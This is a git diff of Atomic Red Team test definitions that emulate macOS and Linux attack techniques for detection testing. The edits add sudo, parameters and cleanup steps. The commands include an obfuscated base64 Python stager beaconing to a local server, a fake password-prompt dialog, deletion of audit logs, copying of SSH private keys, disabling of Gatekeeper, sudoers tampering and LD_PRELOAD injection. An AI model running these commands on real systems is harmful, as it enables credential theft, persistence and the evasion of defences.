diff --git a/atomics/T1027.001/T1027.001.yaml b/atomics/T1027.001/T1027.001.yaml
index 91329390..2b9e8f1d 100644
--- a/atomics/T1027.001/T1027.001.yaml
+++ b/atomics/T1027.001/T1027.001.yaml
@@ -22,7 +22,7 @@ atomic_tests:
prereq_command: |
if [ -f #{file_to_pad} ]; then exit 0; else exit 1; fi;
get_prereq_command: |
- cp /bin/ls /tmp/evil-binary
+ cp /bin/ls #{file_to_pad}
executor:
command: |
dd if=/dev/zero bs=1 count=1 >> #{file_to_pad}
diff --git a/atomics/T1037.004/T1037.004.yaml b/atomics/T1037.004/T1037.004.yaml
index dd60024c..8b664b82 100644
--- a/atomics/T1037.004/T1037.004.yaml
+++ b/atomics/T1037.004/T1037.004.yaml
@@ -11,6 +11,7 @@ atomic_tests:
- macos
executor:
command: |
- echo osascript -e 'tell app "Finder" to display dialog "Hello World"' >> /etc/rc.common
- name: sh
+ sudo echo osascript -e 'tell app "Finder" to display dialog "Hello World"' >> /etc/rc.common
+ elevation_required: true
+ name: bash
diff --git a/atomics/T1040/T1040.yaml b/atomics/T1040/T1040.yaml
index 38144e7a..e89014e9 100644
--- a/atomics/T1040/T1040.yaml
+++ b/atomics/T1040/T1040.yaml
@@ -33,10 +33,18 @@ atomic_tests:
description: Specify interface to perform PCAP on.
type: String
default: en0A
+ dependency_executor_name: /bin/zsh
+ dependencies:
+ - description: |
+ Check if at least one of the tools are installed on the machine.
+ prereq_command: |
+ if [ ! -x "$(command -v tcpdump)" ] && [ ! -x "$(command -v tshark)" ]; then exit 1; else exit 0; fi;
+ get_prereq_command: |
+ echo "Install tcpdump and/or tshark for the test to run."; exit 1;
executor:
command: |
- tcpdump -c 5 -nnni #{interface}
- tshark -c 5 -i #{interface}
+ sudo tcpdump -c 5 -nnni #{interface}
+ if [ -x "$(command -v tshark)" ]; then sudo tshark -c 5 -i #{interface}; fi;
name: bash
elevation_required: true
- name: Packet Capture Windows Command Prompt
diff --git a/atomics/T1053.004/T1053.004.yaml b/atomics/T1053.004/T1053.004.yaml
index bf973427..5e16a975 100644
--- a/atomics/T1053.004/T1053.004.yaml
+++ b/atomics/T1053.004/T1053.004.yaml
@@ -10,45 +10,25 @@ atomic_tests:
supported_platforms:
- macos
- - linux
-
+ input_arguments:
+ script_location:
+ description: evil plist location
+ type: path
+ default: $PathToAtomicsFolder/T1053.004/src/atomicredteam_T1053_004.plist
+ script_destination:
+ description: Path where to move the evil plist
+ type: path
+ default: /etc/emond.d/rules/atomicredteam_T1053_004.plist
+ empty_file:
+ description: Random name of the empty file used to trigger emond service
+ type: string
+ default: randomflag
executor:
- name: manual
- steps: |
- 1. Place this file in /etc/emond.d/rules/atomicredteam.plist
-
-
-
-
-
- name
- atomicredteam
- enabled
-
- eventTypes
-
- startup
-
- actions
-
-
- command
- /usr/bin/say
- user
- root
- arguments
-
- -v Tessa
- I am a persistent startup item.
-
- type
- RunCommand
-
-
-
-
-
-
- 2. Place an empty file in /private/var/db/emondClients/
-
- 3. sudo touch /private/var/db/emondClients/randomflag
\ No newline at end of file
+ name: bash
+ elevation_required: true
+ command: |
+ sudo cp #{script_location} #{script_destination}
+ sudo touch /private/var/db/emondClients/#{empty_file}
+ cleanup_command: |
+ sudo rm #{script_destination}
+ sudo rm /private/var/db/emondClients/#{empty_file}
diff --git a/atomics/T1053.004/src/atomicredteam.plist b/atomics/T1053.004/src/atomicredteam_T1053_004.plist
similarity index 56%
rename from atomics/T1053.004/src/atomicredteam.plist
rename to atomics/T1053.004/src/atomicredteam_T1053_004.plist
index 62bdcff4..082280e2 100644
--- a/atomics/T1053.004/src/atomicredteam.plist
+++ b/atomics/T1053.004/src/atomicredteam_T1053_004.plist
@@ -4,7 +4,7 @@
name
- atomicredteam
+ com.atomicredteam.t1053_004
enabled
eventTypes
@@ -15,13 +15,24 @@
command
- /usr/bin/say
+ /usr/bin/sleep
user
root
arguments
- -v Tessa
- I am a persistent startup item.
+ 10
+
+ type
+ RunCommand
+
+
+ command
+ /usr/bin/touch
+ user
+ root
+ arguments
+
+ /tmp/T1053_004_atomicredteam
type
RunCommand
diff --git a/atomics/T1056.002/T1056.002.yaml b/atomics/T1056.002/T1056.002.yaml
index 0254866a..d65f56da 100644
--- a/atomics/T1056.002/T1056.002.yaml
+++ b/atomics/T1056.002/T1056.002.yaml
@@ -11,7 +11,7 @@ atomic_tests:
executor:
command: |
osascript -e 'tell app "System Preferences" to activate' -e 'tell app "System Preferences" to activate' -e 'tell app "System Preferences" to display dialog "Software Update requires that you type your password to apply changes." & return & return default answer "" with icon 1 with hidden answer with title "Software Update"'
- name: sh
+ name: bash
- name: PowerShell - Prompt User for Password
auto_generated_guid: 2b162bfd-0928-4d4c-9ec3-4d9f88374b52
description: |
diff --git a/atomics/T1059.002/T1059.002.yaml b/atomics/T1059.002/T1059.002.yaml
index ae0a155f..a86f1a93 100644
--- a/atomics/T1059.002/T1059.002.yaml
+++ b/atomics/T1059.002/T1059.002.yaml
@@ -13,6 +13,6 @@ atomic_tests:
- macos
executor:
command: |
- osascript -e \"do shell script \\\"echo \\\\\\\"import sys,base64,warnings;warnings.filterwarnings('ignore');exec(base64.b64decode('aW1wb3J0IHN5cztpbXBvcnQgcmUsIHN1YnByb2Nlc3M7Y21kID0gInBzIC1lZiB8IGdyZXAgTGl0dGxlXCBTbml0Y2ggfCBncmVwIC12IGdyZXAiCnBzID0gc3VicHJvY2Vzcy5Qb3BlbihjbWQsIHNoZWxsPVRydWUsIHN0ZG91dD1zdWJwcm9jZXNzLlBJUEUpCm91dCA9IHBzLnN0ZG91dC5yZWFkKCkKcHMuc3Rkb3V0LmNsb3NlKCkKaWYgcmUuc2VhcmNoKCJMaXR0bGUgU25pdGNoIiwgb3V0KToKICAgc3lzLmV4aXQoKQppbXBvcnQgdXJsbGliMjsKVUE9J01vemlsbGEvNS4wIChXaW5kb3dzIE5UIDYuMTsgV09XNjQ7IFRyaWRlbnQvNy4wOyBydjoxMS4wKSBsaWtlIEdlY2tvJztzZXJ2ZXI9J2h0dHA6Ly8xMjcuMC4wLjE6ODAnO3Q9Jy9sb2dpbi9wcm9jZXNzLnBocCc7cmVxPXVybGxpYjIuUmVxdWVzdChzZXJ2ZXIrdCk7CnJlcS5hZGRfaGVhZGVyKCdVc2VyLUFnZW50JyxVQSk7CnJlcS5hZGRfaGVhZGVyKCdDb29raWUnLCJzZXNzaW9uPXQzVmhWT3MvRHlDY0RURnpJS2FuUnhrdmszST0iKTsKcHJveHkgPSB1cmxsaWIyLlByb3h5SGFuZGxlcigpOwpvID0gdXJsbGliMi5idWlsZF9vcGVuZXIocHJveHkpOwp1cmxsaWIyLmluc3RhbGxfb3BlbmVyKG8pOwphPXVybGxpYjIudXJsb3BlbihyZXEpLnJlYWQoKTsKSVY9YVswOjRdO2RhdGE9YVs0Ol07a2V5PUlWKyc4Yzk0OThmYjg1YmQ1MTE5ZGQ5ODQ4MTJlZTVlOTg5OSc7UyxqLG91dD1yYW5nZSgyNTYpLDAsW10KZm9yIGkgaW4gcmFuZ2UoMjU2KToKICAgIGo9KGorU1tpXStvcmQoa2V5W2klbGVuKGtleSldKSklMjU2CiAgICBTW2ldLFNbal09U1tqXSxTW2ldCmk9aj0wCmZvciBjaGFyIGluIGRhdGE6CiAgICBpPShpKzEpJTI1NgogICAgaj0oaitTW2ldKSUyNTYKICAgIFNbaV0sU1tqXT1TW2pdLFNbaV0KICAgIG91dC5hcHBlbmQoY2hyKG9yZChjaGFyKV5TWyhTW2ldK1Nbal0pJTI1Nl0pKQpleGVjKCcnLmpvaW4ob3V0KSkK'));\\\\\\\" | python &\\\"\"
+ osascript -e "do shell script \"echo \\\"import sys,base64,warnings;warnings.filterwarnings('ignore');exec(base64.b64decode('aW1wb3J0IHN5cztpbXBvcnQgcmUsIHN1YnByb2Nlc3M7Y21kID0gInBzIC1lZiB8IGdyZXAgTGl0dGxlXCBTbml0Y2ggfCBncmVwIC12IGdyZXAiCnBzID0gc3VicHJvY2Vzcy5Qb3BlbihjbWQsIHNoZWxsPVRydWUsIHN0ZG91dD1zdWJwcm9jZXNzLlBJUEUpCm91dCA9IHBzLnN0ZG91dC5yZWFkKCkKcHMuc3Rkb3V0LmNsb3NlKCkKaWYgcmUuc2VhcmNoKCJMaXR0bGUgU25pdGNoIiwgb3V0KToKICAgc3lzLmV4aXQoKQppbXBvcnQgdXJsbGliMjsKVUE9J01vemlsbGEvNS4wIChXaW5kb3dzIE5UIDYuMTsgV09XNjQ7IFRyaWRlbnQvNy4wOyBydjoxMS4wKSBsaWtlIEdlY2tvJztzZXJ2ZXI9J2h0dHA6Ly8xMjcuMC4wLjE6ODAnO3Q9Jy9sb2dpbi9wcm9jZXNzLnBocCc7cmVxPXVybGxpYjIuUmVxdWVzdChzZXJ2ZXIrdCk7CnJlcS5hZGRfaGVhZGVyKCdVc2VyLUFnZW50JyxVQSk7CnJlcS5hZGRfaGVhZGVyKCdDb29raWUnLCJzZXNzaW9uPXQzVmhWT3MvRHlDY0RURnpJS2FuUnhrdmszST0iKTsKcHJveHkgPSB1cmxsaWIyLlByb3h5SGFuZGxlcigpOwpvID0gdXJsbGliMi5idWlsZF9vcGVuZXIocHJveHkpOwp1cmxsaWIyLmluc3RhbGxfb3BlbmVyKG8pOwphPXVybGxpYjIudXJsb3BlbihyZXEsdGltZW91dD0zKS5yZWFkKCk7Cg=='));\\\" | python &\""
name: sh
diff --git a/atomics/T1059.003/T1059.003.yaml b/atomics/T1059.003/T1059.003.yaml
index 1b047d6a..85f304d8 100644
--- a/atomics/T1059.003/T1059.003.yaml
+++ b/atomics/T1059.003/T1059.003.yaml
@@ -13,7 +13,7 @@ atomic_tests:
type: string
default: dir
script_path:
- description: Path of script to create.
+ description: Script path.
type: path
default: $env:TEMP\T1059.003_script.bat
dependency_executor_name: powershell
diff --git a/atomics/T1059.004/T1059.004.yaml b/atomics/T1059.004/T1059.004.yaml
index a5c2e508..1c67ef01 100644
--- a/atomics/T1059.004/T1059.004.yaml
+++ b/atomics/T1059.004/T1059.004.yaml
@@ -8,12 +8,19 @@ atomic_tests:
supported_platforms:
- macos
- linux
+ input_arguments:
+ script_path:
+ description: Script path
+ type: path
+ default: /tmp/art.sh
executor:
command: |
- sh -c "echo 'echo Hello from the Atomic Red Team' > /tmp/art.sh"
- sh -c "echo 'ping -c 4 8.8.8.8' >> /tmp/art.sh"
- chmod +x /tmp/art.sh
- sh /tmp/art.sh
+ sh -c "echo 'echo Hello from the Atomic Red Team' > #{script_path}"
+ sh -c "echo 'ping -c 4 8.8.8.8' >> #{script_path}"
+ chmod +x #{script_path}
+ sh #{script_path}
+ cleanup_command: |
+ rm #{script_path}
name: sh
- name: Command-Line Interface
auto_generated_guid: d0c88567-803d-4dca-99b4-7ce65e7b257c
diff --git a/atomics/T1069.001/T1069.001.yaml b/atomics/T1069.001/T1069.001.yaml
index 566d5564..1a050f98 100644
--- a/atomics/T1069.001/T1069.001.yaml
+++ b/atomics/T1069.001/T1069.001.yaml
@@ -10,7 +10,7 @@ atomic_tests:
- linux
executor:
command: |
- if [ -x "$(command -v dscacheutil)" ]; then dscacheutil -q group; else echo "dscacheutil is missing from the machine. skipping..."; fi; fi;
+ if [ -x "$(command -v dscacheutil)" ]; then dscacheutil -q group; else echo "dscacheutil is missing from the machine. skipping..."; fi;
if [ -x "$(command -v dscl)" ]; then dscl . -list /Groups; else echo "dscl is missing from the machine. skipping..."; fi;
if [ -x "$(command -v groups)" ]; then groups; else echo "groups is missing from the machine. skipping..."; fi;
name: sh
diff --git a/atomics/T1083/T1083.yaml b/atomics/T1083/T1083.yaml
index 3d2fec52..f86c8fcf 100644
--- a/atomics/T1083/T1083.yaml
+++ b/atomics/T1083/T1083.yaml
@@ -78,7 +78,7 @@ atomic_tests:
cd $HOME && find . -print | sed -e 's;[^/]*/;|__;g;s;__|; |;g' > #{output_file}
if [ -f /etc/mtab ]; then cat /etc/mtab >> #{output_file}; fi;
find . -type f -iname *.pdf >> #{output_file}
- cat #{output_file}; fi;
+ cat #{output_file}
find . -type f -name ".*"
cleanup_command: 'rm #{output_file}'
name: sh
diff --git a/atomics/T1087.001/T1087.001.yaml b/atomics/T1087.001/T1087.001.yaml
index 9538c8d8..55e8968a 100644
--- a/atomics/T1087.001/T1087.001.yaml
+++ b/atomics/T1087.001/T1087.001.yaml
@@ -34,7 +34,7 @@ atomic_tests:
default: /tmp/T1087.001.txt
executor:
command: |
- cat /etc/sudoers > #{output_file}
+ sudo cat /etc/sudoers > #{output_file}
cat #{output_file}
cleanup_command: |
rm -f #{output_file}
diff --git a/atomics/T1090.001/T1090.001.yaml b/atomics/T1090.001/T1090.001.yaml
index 1e1ada87..8c0f7dec 100644
--- a/atomics/T1090.001/T1090.001.yaml
+++ b/atomics/T1090.001/T1090.001.yaml
@@ -26,6 +26,35 @@ atomic_tests:
unset http_proxy
unset https_proxy
name: sh
+- name: Connection Proxy for macOS UI
+ description: |
+ Enable traffic redirection on macOS UI (not terminal).
+ The test will modify and enable the "Web Proxy" and "Secure Web Proxy" settings in System Preferences => Network => Advanced => Proxies for the specified network interface.
+
+ Note that this test may conflict with pre-existing system configuration.
+ supported_platforms:
+ - macos
+ input_arguments:
+ proxy_server:
+ description: Proxy server URL (host)
+ type: string
+ default: 127.0.0.1
+ proxy_port:
+ description: Proxy server port
+ type: string
+ default: 8080
+ interface:
+ description: Protocol to proxy (http or https)
+ type: string
+ default: Wi-Fi
+ executor:
+ name: sh
+ command: |
+ networksetup -setwebproxy #{interface} #{proxy_server} #{proxy_port}
+ networksetup -setsecurewebproxy #{interface} #{proxy_server} #{proxy_port}
+ cleanup_command: |
+ networksetup -setwebproxystate #{interface} off
+ networksetup -setsecurewebproxystate #{interface} off
- name: portproxy reg key
auto_generated_guid: b8223ea9-4be2-44a6-b50a-9657a3d4e72a
description: |
diff --git a/atomics/T1136.001/T1136.001.yaml b/atomics/T1136.001/T1136.001.yaml
index 39aeb4b6..c555483e 100644
--- a/atomics/T1136.001/T1136.001.yaml
+++ b/atomics/T1136.001/T1136.001.yaml
@@ -37,7 +37,7 @@ atomic_tests:
executor:
command: |
dscl . -create /Users/#{username}
- dscl . -create /Users/#{username} UserShell /bin/bash
+ dscl . -create /Users/#{username} UserShell /bin/zsh
dscl . -create /Users/#{username} RealName "#{realname}"
dscl . -create /Users/#{username} UniqueID "1010"
dscl . -create /Users/#{username} PrimaryGroupID 80
diff --git a/atomics/T1518.001/T1518.001.yaml b/atomics/T1518.001/T1518.001.yaml
index 998cef68..856dfeaf 100644
--- a/atomics/T1518.001/T1518.001.yaml
+++ b/atomics/T1518.001/T1518.001.yaml
@@ -46,6 +46,7 @@ atomic_tests:
command: |
ps -ef | grep Little\ Snitch | grep -v grep
ps aux | grep CbOsxSensorService
+ ps aux | grep falcond
name: sh
- name: Security Software Discovery - Sysmon Service
auto_generated_guid: fe613cf3-8009-4446-9a0f-bc78a15b66c9
diff --git a/atomics/T1543.001/T1543.001.yaml b/atomics/T1543.001/T1543.001.yaml
index dd555d4f..14771b3d 100644
--- a/atomics/T1543.001/T1543.001.yaml
+++ b/atomics/T1543.001/T1543.001.yaml
@@ -7,34 +7,32 @@ atomic_tests:
Create a plist and execute it
supported_platforms:
- macos
+ input_arguments:
+ plist_filename:
+ description: filename
+ type: string
+ default: com.atomicredteam.plist
+ path_malicious_plist:
+ description: Name of file to store in cron folder
+ type: string
+ default: $PathToAtomicsFolder/T1543.001/src/atomicredteam_T1543_001.plist
+
+ dependency_executor_name: bash
+ dependencies:
+ - description: |
+ The shared library must exist on disk at specified location (#{path_to_shared_library})
+ prereq_command: |
+ if [ -f #{path_malicious_plist} ]; then exit 0; else exit 1; fi;
+ get_prereq_command: |
+ echo "The shared library doesn't exist. Check the path"; exit 1;
executor:
- steps: |
- 1. Create file - .client
-
- 2. osascript -e 'tell app "Finder" to display dialog "Hello World"'
-
- 3. Place the following in a new file under ~/Library/LaunchAgents as com.atomicredteam.plist
-
- 4.
-
-
-
-
- KeepAlive
-
- Label
- com.client.client
- ProgramArguments
-
- /Users//.client
-
- RunAtLoad
-
- NSUIElement
- 1
-
-
-
- 5. launchctl load -w ~/Library/LaunchAgents/com.atomicredteam.plist
- name: manual
+ name: bash
+ elevation_required: true
+ command: |
+ if [ ! -d ~/Library/LaunchAgents ]; then mkdir ~/Library/LaunchAgents; fi;
+ sudo cp #{path_malicious_plist} ~/Library/LaunchAgents/#{plist_filename}
+ sudo launchctl load -w ~/Library/LaunchAgents/#{plist_filename}
+ cleanup: |
+ sudo launchctl unload ~/Library/LaunchAgents/#{plist_filename}
+ sudo rm ~/Library/LaunchAgents/#{plist_filename}
diff --git a/atomics/T1543.001/src/atomicredteam_T1543_001.plist b/atomics/T1543.001/src/atomicredteam_T1543_001.plist
new file mode 100644
index 00000000..3664e1aa
--- /dev/null
+++ b/atomics/T1543.001/src/atomicredteam_T1543_001.plist
@@ -0,0 +1,17 @@
+
+
+
+
+ Label
+ com.atomicredteam.t1543_001
+ ProgramArguments
+
+ touch
+ /tmp/T1543_001_atomicredteam.txt
+
+ RunAtLoad
+
+ NSUIElement
+ 1
+
+
diff --git a/atomics/T1543.004/T1543.004.yaml b/atomics/T1543.004/T1543.004.yaml
index cabccc3f..a806db85 100644
--- a/atomics/T1543.004/T1543.004.yaml
+++ b/atomics/T1543.004/T1543.004.yaml
@@ -5,26 +5,34 @@ atomic_tests:
auto_generated_guid: 03ab8df5-3a6b-4417-b6bd-bb7a5cfd74cf
description: |
Utilize LaunchDaemon to launch `Hello World`
- supported_platforms:
- - macos
- executor:
- steps: |
- 1. Place the following file (com.example.hello) in /System/Library/LaunchDaemons or /Library/LaunchDaemons
- 2.
-
-
-
-
- Label
- com.example.hello
- ProgramArguments
-
- hello
- world
-
- KeepAlive
-
-
-
- name: manual
+
+ supported_platforms:
+ - macos
+
+ input_arguments:
+ plist_filename:
+ description: filename
+ type: string
+ default: com.atomicredteam.plist
+ path_malicious_plist:
+ description: Name of file to store in cron folder
+ type: string
+ default: $PathToAtomicsFolder/T1543.004/src/atomicredteam_T1543_004.plist
+ dependency_executor_name: bash
+ dependencies:
+ - description: |
+ The shared library must exist on disk at specified location (#{path_to_shared_library})
+ prereq_command: |
+ if [ -f #{path_malicious_plist} ]; then exit 0; else exit 1; fi;
+ get_prereq_command: |
+ echo "The plist file doesn't exist. Check the path and try again."; exit 1;
+ executor:
+ name: bash
+ elevation_required: true
+ command: |
+ sudo cp #{path_malicious_plist} /Library/LaunchDaemons/#{plist_filename}
+ sudo launchctl load -w /Library/LaunchDaemons/#{plist_filename}
+ cleanup: |
+ sudo launchctl unload /Library/LaunchDaemons/#{plist_filename}
+ sudo rm /Library/LaunchDaemons/#{plist_filename}
diff --git a/atomics/T1543.004/src/atomicredteam_T1543_004.plist b/atomics/T1543.004/src/atomicredteam_T1543_004.plist
new file mode 100644
index 00000000..fec42ec6
--- /dev/null
+++ b/atomics/T1543.004/src/atomicredteam_T1543_004.plist
@@ -0,0 +1,15 @@
+
+
+
+
+ Label
+ com.atomicredteam.t1543_004
+ ProgramArguments
+
+ touch
+ /tmp/T1543_004_atomicredteam.txt
+
+ KeepAlive
+
+
+
diff --git a/atomics/T1546.014/src/T1546.014_emond.plist b/atomics/T1546.014/src/T1546.014_emond.plist
index 69b2b778..ef00a146 100644
--- a/atomics/T1546.014/src/T1546.014_emond.plist
+++ b/atomics/T1546.014/src/T1546.014_emond.plist
@@ -4,42 +4,40 @@
name
- Atomic Red Team T1165
- enabled
-
- eventTypes
-
- startup
-
- actions
-
-
- command
- /bin/sleep
- user
- root
- arguments
-
- 30
-
- type
- RunCommand
-
-
- command
- /usr/bin/say
- user
- root
- arguments
-
- -v
- Karen
- Hello from Atomic Red Team technique T1165
-
- type
- RunCommand
-
-
-
+ AtomicRedTeam_T1546_014
+ enabled
+
+ eventTypes
+
+ startup
+
+ actions
+
+
+ command
+ /usr/bin/sleep
+ user
+ root
+ arguments
+
+ 10
+
+ type
+ RunCommand
+
+
+ command
+ /usr/bin/touch
+ user
+ root
+ arguments
+
+ /tmp/T1546_014_atomicredteam
+
+ type
+ RunCommand
+
+
+
diff --git a/atomics/T1547.007/T1547.007.yaml b/atomics/T1547.007/T1547.007.yaml
index aeee40dd..69c90673 100644
--- a/atomics/T1547.007/T1547.007.yaml
+++ b/atomics/T1547.007/T1547.007.yaml
@@ -35,5 +35,8 @@ atomic_tests:
executor:
command: |
sudo defaults write com.apple.loginwindow LoginHook #{script}
+ cleanup: |
sudo defaults delete com.apple.loginwindow LoginHook
- name: sh
\ No newline at end of file
+ elevation_required: true
+ name: sh
+
\ No newline at end of file
diff --git a/atomics/T1548.003/T1548.003.yaml b/atomics/T1548.003/T1548.003.yaml
index 149fc83f..a6f671a8 100644
--- a/atomics/T1548.003/T1548.003.yaml
+++ b/atomics/T1548.003/T1548.003.yaml
@@ -14,11 +14,11 @@ atomic_tests:
executor:
name: sh
+ elevation_required: true
command: |
- sudo -l
- sudo su
- cat /etc/sudoers
- vim /etc/sudoers
+ sudo -l
+ sudo cat /etc/sudoers
+ sudo vim /etc/sudoers
- name: Unlimited sudo cache timeout
auto_generated_guid: a7b17659-dd5e-46f7-b7d1-e6792c91d0bc
@@ -31,6 +31,7 @@ atomic_tests:
executor:
name: sh
+ elevation_required: true
command: |
sudo sed -i 's/env_reset.*$/env_reset,timestamp_timeout=-1/' /etc/sudoers
sudo visudo -c -f /etc/sudoers
@@ -46,6 +47,7 @@ atomic_tests:
executor:
name: sh
+ elevation_required: true
command: |
sudo sh -c "echo Defaults "'!'"tty_tickets >> /etc/sudoers"
sudo visudo -c -f /etc/sudoers
\ No newline at end of file
diff --git a/atomics/T1551.002/T1551.002.yaml b/atomics/T1551.002/T1551.002.yaml
index 2397e36b..e9b1fbfe 100644
--- a/atomics/T1551.002/T1551.002.yaml
+++ b/atomics/T1551.002/T1551.002.yaml
@@ -10,9 +10,10 @@ atomic_tests:
- linux
executor:
command: |
- rm -rf /private/var/log/system.log*
- rm -rf /private/var/audit/*
+ sudo rm -rf /private/var/log/system.log*
+ sudo rm -rf /private/var/audit/*
name: sh
+ elevation_required: true
- name: Overwrite Linux Mail Spool
auto_generated_guid: 1602ff76-ed7f-4c94-b550-2f727b4782d4
description: |
diff --git a/atomics/T1552.001/T1552.001.yaml b/atomics/T1552.001/T1552.001.yaml
index 66bb8492..5bd597e8 100644
--- a/atomics/T1552.001/T1552.001.yaml
+++ b/atomics/T1552.001/T1552.001.yaml
@@ -10,7 +10,8 @@ atomic_tests:
executor:
command: |
python2 laZagne.py all
- name: sh
+ elevation_required: true
+ name: bash
- name: Extract passwords with grep
auto_generated_guid: bd4cf0d1-7646-474e-8610-78ccf5a097c4
description: |
diff --git a/atomics/T1552.004/T1552.004.yaml b/atomics/T1552.004/T1552.004.yaml
index d03bbcbe..91df1ceb 100644
--- a/atomics/T1552.004/T1552.004.yaml
+++ b/atomics/T1552.004/T1552.004.yaml
@@ -21,14 +21,20 @@ atomic_tests:
- macos
- linux
input_arguments:
+ search_path:
+ description: Path where to start searching from.
+ type: path
+ default: /
output_file:
description: Output file containing locations of SSH key files
type: path
default: /tmp/keyfile_locations.txt
executor:
command: |
- find / -name id_rsa >> #{output_file}
- find / -name id_dsa >> #{output_file}
+ find #{search_path} -name id_rsa >> #{output_file}
+ find #{search_path} -name id_dsa >> #{output_file}
+ cleanup_command: |
+ rm #{output_file}
name: sh
- name: Copy Private SSH Keys with CP
auto_generated_guid: 7c247dc7-5128-4643-907b-73a76d9135c3
@@ -37,6 +43,10 @@ atomic_tests:
supported_platforms:
- linux
input_arguments:
+ search_path:
+ description: Path where to start searching from.
+ type: path
+ default: /
output_folder:
description: Output folder containing copies of SSH private key files
type: path
@@ -44,8 +54,10 @@ atomic_tests:
executor:
command: |
mkdir #{output_folder}
- find / -name id_rsa -exec cp --parents {} #{output_folder} \;
- find / -name id_dsa -exec cp --parents {} #{output_folder} \;
+ find #{search_path} -name id_rsa -exec cp --parents {} #{output_folder} \;
+ find #{search_path} -name id_dsa -exec cp --parents {} #{output_folder} \;
+ cleanup_command: |
+ rm #{output_folder}
name: sh
- name: Copy Private SSH Keys with rsync
auto_generated_guid: 864bb0b2-6bb5-489a-b43b-a77b3a16d68a
@@ -55,6 +67,10 @@ atomic_tests:
- macos
- linux
input_arguments:
+ search_path:
+ description: Path where to start searching from.
+ type: path
+ default: /
output_folder:
description: Output folder containing copies of SSH private key files
type: path
@@ -62,6 +78,9 @@ atomic_tests:
executor:
command: |
mkdir #{output_folder}
- find / -name id_rsa -exec rsync -R {} #{output_folder} \;
- find / -name id_dsa -exec rsync -R {} #{output_folder} \;
- name: sh
\ No newline at end of file
+ find #{search_path} -name id_rsa -exec rsync -R {} #{output_folder} \;
+ find #{search_path} -name id_dsa -exec rsync -R {} #{output_folder} \;
+ cleanup_command: |
+ rm -rf #{output_folder}
+ name: sh
+
\ No newline at end of file
diff --git a/atomics/T1553.001/T1553.001.yaml b/atomics/T1553.001/T1553.001.yaml
index 29de7fe1..ed174aa8 100644
--- a/atomics/T1553.001/T1553.001.yaml
+++ b/atomics/T1553.001/T1553.001.yaml
@@ -16,4 +16,5 @@ atomic_tests:
command: |
sudo xattr -r -d com.apple.quarantine #{app_path}
sudo spctl --master-disable
- name: sh
\ No newline at end of file
+ elevation_required: true
+ name: sh
diff --git a/atomics/T1555.001/T1555.001.yaml b/atomics/T1555.001/T1555.001.yaml
index cdc9c380..1e53ce65 100644
--- a/atomics/T1555.001/T1555.001.yaml
+++ b/atomics/T1555.001/T1555.001.yaml
@@ -17,9 +17,18 @@ atomic_tests:
[Keychain dumper](https://github.com/juuso/keychaindump)
supported_platforms:
- macos
+ input_arguments:
+ cert_import:
+ description: Specify the path of the certificates to import.
+ type: path
+ default: /tmp/certs.pem
+ cert_export:
+ description: Specify the path of the certificates to export.
+ type: path
+ default: /tmp/certs.pem
executor:
command: |
security -h
- security find-certificate -a -p > allcerts.pem
- security import /tmp/certs.pem -k
- name: sh
\ No newline at end of file
+ security find-certificate -a -p > #{cert_export}
+ security import #{cert_export} -k
+ name: sh
diff --git a/atomics/T1560.001/T1560.001.yaml b/atomics/T1560.001/T1560.001.yaml
index f920e406..13a1b1f6 100644
--- a/atomics/T1560.001/T1560.001.yaml
+++ b/atomics/T1560.001/T1560.001.yaml
@@ -153,15 +153,13 @@ atomic_tests:
- description: |
Files to zip must exist (#{input_files})
prereq_command: |
- ls #{input_files}
+ if [ $(ls #{input_files} | wc -l) > 0 ]; then exit 0; else exit 1; fi;
get_prereq_command: |
echo Please set input_files argument to include files that exist
executor:
name: sh
elevation_required: false
- prereq_command: |
- ls #{input_files} > /dev/null
command: |
zip #{output_file} #{input_files}
cleanup_command: |
diff --git a/atomics/T1564.001/T1564.001.yaml b/atomics/T1564.001/T1564.001.yaml
index b0ce7692..340a8ca2 100644
--- a/atomics/T1564.001/T1564.001.yaml
+++ b/atomics/T1564.001/T1564.001.yaml
@@ -100,6 +100,11 @@ atomic_tests:
Hide a directory on MacOS
supported_platforms:
- macos
+ input_arguments:
+ filename:
+ description: path of file to hide
+ type: path
+ default: /tmp/evil
executor:
command: |
touch /var/tmp/T1564.001_mac.txt
diff --git a/atomics/T1564.002/T1564.002.yaml b/atomics/T1564.002/T1564.002.yaml
index fc8e8064..de822dc9 100644
--- a/atomics/T1564.002/T1564.002.yaml
+++ b/atomics/T1564.002/T1564.002.yaml
@@ -15,4 +15,7 @@ atomic_tests:
executor:
command: |
sudo dscl . -create /Users/#{user_name} UniqueID 333
- name: sh
\ No newline at end of file
+ cleanup_command: |
+ sudo dscl . -delete /Users/#{username}
+ elevation_required: true
+ name: sh
diff --git a/atomics/T1569.001/T1569.001.yaml b/atomics/T1569.001/T1569.001.yaml
index 840b6279..11df555e 100644
--- a/atomics/T1569.001/T1569.001.yaml
+++ b/atomics/T1569.001/T1569.001.yaml
@@ -7,7 +7,18 @@ atomic_tests:
Utilize launchctl
supported_platforms:
- macos
+ input_arguments:
+ executable_path:
+ description: Path of the executable to run.
+ type: path
+ default: /System/Applications/Calculator.app/Contents/MacOS/Calculator
+ label_name:
+ description: Path of the executable to run.
+ type: string
+ default: evil
executor:
command: |
- launchctl submit -l evil -- /Applications/Calculator.app/Contents/MacOS/Calculator
- name: sh
\ No newline at end of file
+ launchctl submit -l #{label_name} -- #{executable_path}
+ cleanup_command: |
+ launchctl remove #{label_name}
+ name: bash
diff --git a/atomics/T1574.006/T1574.006.yaml b/atomics/T1574.006/T1574.006.yaml
index c75a5006..399ee53f 100644
--- a/atomics/T1574.006/T1574.006.yaml
+++ b/atomics/T1574.006/T1574.006.yaml
@@ -29,7 +29,8 @@ atomic_tests:
executor:
command: |
sudo sh -c 'echo #{path_to_shared_library} > /etc/ld.so.preload'
- cleanup_command: ""
+ cleanup_command: |
+ sudo sed -i '/#{path_to_shared_library}/d' /etc/ld.so.preload
name: bash
elevation_required: true
- name: Shared Library Injection via LD_PRELOAD